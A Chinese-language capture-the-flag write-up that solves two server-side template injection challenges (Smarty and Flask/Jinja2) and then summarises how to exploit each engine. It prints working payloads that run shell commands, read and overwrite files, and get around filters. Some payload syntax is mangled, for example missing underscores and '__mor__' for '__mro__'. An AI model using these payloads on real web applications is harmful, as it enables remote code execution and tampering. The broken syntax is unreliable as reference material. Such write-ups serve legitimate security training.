1.[HDCTF 2023]SearchMaster
他说模板都一样,可能有模板注入,再看后面POST传一个data参数
尝试传参
传1的时候显示1,可能有SSTI注入漏洞,测试一下{{7*7}}
成功的执行了,说明存在SSTI漏洞,但是是什么模板还需要再判断
{{config}}渲染函数看一下
报错了,看报错内容,smarty模板
所以这题是smarty模板的SSTI注入漏洞
尝试命令执行,
构造{{system('ls /')}}查看根目录下的文件
可以看到有一个flag字样的文件,cat命令打开
{{system('cat /flag_13_searchmaster')}}
得到flag
2.[HNCTF 2022 WEEK2]ez_SSTI
还是SSTI注入,但是看了很久没有参数,可能需要爆参数
参数是name,当然也可以用fuzz
传参:?name={{7*7}}
确实是SSTI模板注入漏洞
config渲染函数看一下
出来了这些东西,看不懂不要紧,搜索看一下
可以看到是flask模板
{{"".class.bases[0].subclasses()}}
遍历子目录
可以看到有非常多的函数,但哪个可以使用还需要测试,最终
构造?name={{config.class.init.globals['os'].popen('ls').read()}}
读取读取目录下的文件
再用cat命令读取flag,构造
?name={{config.class.init.globals['os'].popen('cat flag').read()}}
sstiFLASK模板可以看作者给的这个https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#python
总结两个模板,smarty模板和FLASK模板
Smarty是一个PHP的模板引擎,提供让程序逻辑与页面显示(HTML/CSS)代码分离的功能。
Smarty是基于PHP开发的,对于Smarty的SSTI的利用手段与常见的flask的SSTI有很大区别。
一般情况下输入{$smarty.version}就可以看到返回的smarty的版本号。
Smarty支持使用{php}{/php}
标签来执行被包裹其中的php指令,最常规的思路自然是先测试该标签。但是在smarty3中表明:Smarty已经废弃{php}
标签,强烈建议不要使用。在Smarty 3.1,{php}
仅在SmartyBC中可用。不做过多的描述。
Smarty的{if}条件判断和PHP的if非常相似,只是增加了一些特性。每个{if}必须有一个配对的{/if},也可以使用{else} 和 {elseif},全部的PHP条件表达式和函数都可以在if内使用,如||*, or, &&, and, is_array(), 等等,如:{if is_array($array)}{/if}*
{}标签
直接输入php命令例如:{system("ls")}
以下是SSTI注入的常规方法。
可以执行的话箭头是往上走,不可以执行就是往下走,如此便可以判断方法。
FLASK模板
一、flask是用python编写的一个轻量web开发框架。
二、flask使用jinjia2渲染引擎进行网页渲染,当处理不得当,未进行语句过滤,用户输入{{控制语句}},会导致渲染出恶意代码,形成注入。
三、flask基础知识:
class 子类
object 父类
object是父子关系的顶端,所有的数据类型最终都是父类object
子类可以调用父类下的其他子类,也就是我做不到的事情找我的父类,我的父类会找能做这件事的子类帮我把这件事做了。
__class__看当前类。假设是A
class.__base__看当前类A的父类B,假设是B
class.base.__base__看B的父类,,,属于层层递进
class.__mor__罗列所有的父类关系
__subclasses__可以调用父类下面的其他子类
init(初始化方法),globals(访问全局变量,字典),通过popen,以及read方法来进行系统命令执行
print('abc'.class.base.subclasses__()[41].init.globals['os']('fl4g').read())
{{''.class.mro[2].subclasses()[71].init.globals['os'].listdir('.')}}
__builtins__下的open进行文件的读取:
{{''.class.mro[1].subclasses()[134].init.globals['builtins']['open']('1.txt').read())}}
通过write() 方式修改文件内容
{{''.class.mro[1].subclasses()[41].init.globals['builtins']['open']('1.txt','w').write('123456')}}
小结:
class 返回类型所属的对象
mro 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。
base 返回该对象所继承的基类 // __base__和__mro__都是用来寻找基类的
subclasses 每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表
init 类的初始化方法
globals 对包含函数全局变量的字典的引用
注意{{''.class}},这个payload的单引号可以换成"" [] ()
因为不管他包裹的是什么子类,最终返回的父类都是同一个的。
这样在有些地方被过滤了就可以替换。
__subclasses__后面要跟括号,这样才能被认为是一个函数来被执行.